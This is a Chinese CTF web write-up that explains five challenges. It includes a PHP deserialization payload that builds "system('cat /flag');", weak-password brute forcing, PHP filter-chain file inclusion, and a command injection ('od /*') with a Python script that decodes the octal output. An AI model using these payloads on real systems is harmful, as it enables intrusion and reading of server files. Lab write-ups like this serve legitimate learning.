Web
驴友小镇
访问shuyulaoshi.txt得到提示
f12得到flag
石能为鼓
f12可以看到提示
访问可以发现是一道简单的反序列化
<?php
show_source(__FILE__);
class ping {
public $xiang;
}
class cup {
public $data;
}
$a = new ping();
$a->xiang = new cup();
$a->xiang->data = "system('cat /flag');";
echo urlencode(serialize($a));
d传参得到flag
龙溪秘境
根据paizhaojuzhang.txt的提示
仅凭burp就能破解,结合登录框可推测应该是弱密码爆破
弱密码用户名字典,得到用户名为test
然后将弱密码字典加密,爆破
武功论剑
提示中:陈霸先:朕将御驾亲征,如少侠能使用PHP chain与朕同行,必能将那侯景斩于马下
php过滤链生成器项目
https://github.com/synacktiv/php_filter_chain_generator/blob/main/README.md
传入file变量得到flag
真君擒龙
根据提示cmd传入命令:od /*
# 第一组八进制数据
octal_data_1 = [
0o66146, 0o63541, 0o61173, 0o30545, 0o34065, 0o60467, 0o26460, 0o33071,
0o30143, 0o32055, 0o32062, 0o26470, 0o33070, 0o62063, 0o30055, 0o60466
]
# 第二组八进制数据
octal_data_2 = [
0o61470, 0o33064, 0o61144, 0o60464, 0o76460, 0o00012, 0o00053
]
def octal_to_bytearray(octal_data):
byte_array = bytearray()
for octal in octal_data:
if octal != 0:
byte_array.extend(octal.to_bytes((octal.bit_length() + 7) // 8, byteorder='big'))
return byte_array
# 将两组八进制数据分别转换为字节数组
byte_array_1 = octal_to_bytearray(octal_data_1)
byte_array_2 = octal_to_bytearray(octal_data_2)
# 拼接两个字节数组
final_byte_array = byte_array_1 + byte_array_2
# 打印最终的字节数组
print(final_byte_array)
def swap_pairs(s):
# 交换每两个字符
return ''.join(s[i+1:i+2] + s[i:i+1] for i in range(0, len(s) - 1, 2))
# 假设 decoded_string 是之前解码得到的字符串
decoded_string = "lfgab{1e85a7-0690c4-42-868d30-a6c864bda4}0"
corrected_string = swap_pairs(decoded_string)
print("Original String:", decoded_string)
print("Corrected String:", corrected_string)
标签:bytearray,string,湘赣,octal,byte,data,array
From: https://www.cnblogs.com/1nnya/p/18324326